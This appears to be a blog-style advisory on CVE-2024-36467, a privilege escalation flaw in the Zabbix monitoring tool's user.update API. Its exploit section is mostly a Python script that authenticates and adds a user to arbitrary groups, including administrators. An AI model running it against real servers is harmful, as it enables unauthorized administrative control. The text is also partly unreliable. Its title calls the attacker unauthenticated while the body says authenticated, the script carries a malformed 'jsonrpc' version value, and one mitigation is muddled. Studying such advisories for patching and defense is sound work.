CVE-2024-36467: Unauthenticated User Gains Access to Group Management API in Zabbix Monitoring Tool

A security vulnerability in Zabbix Monitoring Tool (CVE-2024-36467) allows an authenticated user with basic API access to elevate privileges by adding themselves to any group, such as Zabbix administrators, utilizing the user.update API endpoint. This could lead to unauthorized system modifications and data breaches. It is essential for organizations using affected versions of the Zabbix Monitoring Tool to patch or apply mitigations immediately.

Detailed Overview

Zabbix Monitoring Tool, a widely used open-source network monitoring software package, suffers from a critical vulnerability with a designated ID of CVE-2024-36467. This vulnerability allows a user with limited access, such as a user with the default user role, to exploit the user.update API endpoint without proper authorization.

With minimal effort, malicious users with basic API access could insert themselves into any group, including those with administrative privileges. This effectively enables unauthorized access to sensitive data and the ability to modify system settings. The only exception is that users cannot join groups designated as 'disabled' or those that carry the 'restricted GUI access' label.

Exploit Details

To exploit this vulnerability, an authenticated user with API access (e.g., a user in the default User role) needs to make an API request to the user.update endpoint, specifying the target user and the group IDs the user wants to be added to:

import requests
import json

url = "http://zabbix.example.com/api_jsonrpc.php";
headers = {"Content-Type": "application/json"}

# Authentication Request
data = {
    "jsonrpc": "2.",
    "method": "user.login",
    "params": {
        "user": "<username>",
        "password": "<password>"
    },
    "id": 1,
    "auth": None
}

response = requests.post(url, data=json.dumps(data), headers=headers)
result = response.json()
auth_token = result["result"]

# Update User Request, adding the user to specified groups
data["method"] = "user.update"
data["params"] = {
    "userid": "<target_user_id>",
    "usrgrps": [{"usrgrpid": "<group_id_1>"}, {"usrgrpid": "<group_id_2>"}]
}
data["auth"] = auth_token

response = requests.post(url, data=json.dumps(data), headers=headers)
result = response.json()
print(result)

This code snippet would require the attacker to replace the placeholders with their relevant information, such as their username and password, the target user ID, and the desired group IDs.

Office References & Mitigations

- Original advisory: Zabbix Security Advisory CVE-2024-36467
- Link to patches: Zabbix GitHub - Patches for CVE-2024-36467

The vulnerability has been patched, and users can upgrade their Zabbix installation to the latest version here. Additionally, users can apply the patches provided in the GitHub repository (link above) specific to their Zabbix version.

In the meantime, as a temporary mitigation strategy, organizations can restrict API access to the default User role, carefully review and manage their user base, or monitor access to the user.update API endpoint.

Note that applying patches, updating the software, and temporary mitigation actions are critical in preventing the exploitation of this vulnerability.

Timeline

Published on: 11/27/2024 07:15:09 UTC